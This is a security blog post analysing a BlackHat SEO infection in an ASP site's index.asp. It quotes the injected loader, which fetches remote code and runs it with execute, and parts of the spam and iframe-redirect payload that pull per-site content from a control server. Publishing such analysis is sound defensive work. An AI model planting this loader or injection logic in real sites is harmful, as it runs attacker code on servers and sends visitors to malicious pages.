It’s all too easy to scream and holler at PHP based websites and the various malware variants associate with the technology, but perhaps we’re a bit too biased.
Here is a quick post on ASP variant. Thought we’d give you Microsoft types some love too.
Today we found this nice BlackHat SEO attack:
Finding it was easy. The bad code was sitting at the beginning of index.asp begging for some attention:
Server.ScriptTimeout=1500 body=GetHtml("httx://") execute body Public Function GetHtml(url) Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP") ObjXMLHTTP.Open "GET",url,False ObjXMLHTTP.setRequestHeader "User-Agent",url ObjXMLHTTP.send GetHtml=ObjXMLHTTP.responseBody Set ObjXMLHTTP=Nothing set objStream = Server.CreateObject("Adodb.Stream") objStream.Type = 1 objStream.Mode =3 objStream.Open objStream.Write GetHtml objStream.Position = 0 objStream.Type = 2 objStream.Charset = "UTF-8" GetHtml = objStream.ReadText objStream.Close End Function
The code is really straight forward, it creates a function called GetHtml, that downloads the content from httx:// and executes it.
Curious what the code is? Not to worry, it’s nothing more than an ASP variant of some good old conditional malware (image is a snippet).
What I do find very interesting about this code is the following snippet:
Refer= Request.ServerVariables("HTTP_REFERER") '// 父级来源地址 user_agent=Request.ServerVariables("HTTP_USER_AGENT") '//服务器信息 host=Request.ServerVariables("HTTP_HOST") ip=Request.ServerVariables("REMOTE_ADDR") http_host = host info = Request.ServerVariables("PATH_INFO") If InStr(http_host,"www") > 0 Then shellsite=right(http_host,len(http_host)-3-InStr(http_host,"www")) else shellsite=http_host end if base = "" indexurl = base&"/"&shellsite&"/index.php" object_str = base&"/"&shellsite&"/object.txt" if CheckURL(object_str) then ret_object = Trim(getHTTPPage(object_str)) end if
Each infected site has its own version of the spam content, only “valid” infected sites will download this spam code. You’ll find that the iframe injection is also there:
jump_str = base&"/"&shellsite&"/jump.txt" 'response.Write jump_str newcode = 0 '是否是新跳转代码 if Len(ret_object)>3 and CheckURL(object_str) then open_urls = base&"/"&ret_object&"/url.txt" '跳转站列表 'response.Write open_urls open_urls = getHTTPPage(open_urls) '随机取个站2013-08-23 DomainTypeArray = split(open_urls,"|") Pathcoun = Ubound(DomainTypeArray) Randomize RndNumber = INT((Pathcoun+1)*RND) 'response.Write DomainTypeArray(RndNumber) if instr(DomainTypeArray(RndNumber),"www")>0 then open_url = "" else open_url = "" end if newcode = 1 else open_url = base&"/"&shellsite&"/url.txt" '唯一跳转代码 end if
It’s a good dynamic control of what to inject in the sites code.
In short, all this to say, ASP is no better than PHP, there are equal number of variants on both technologies. We just write more about PHP as it’s one of the most prevalent technologies being consumed by everyday website owners, and their lovely Content Management Systems (CMS).
Oh, and did anyone else notice, what appears to be, Chinese :)… ummmm….. ;P
that’s great~this guy has a bad habit.
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Great insights.
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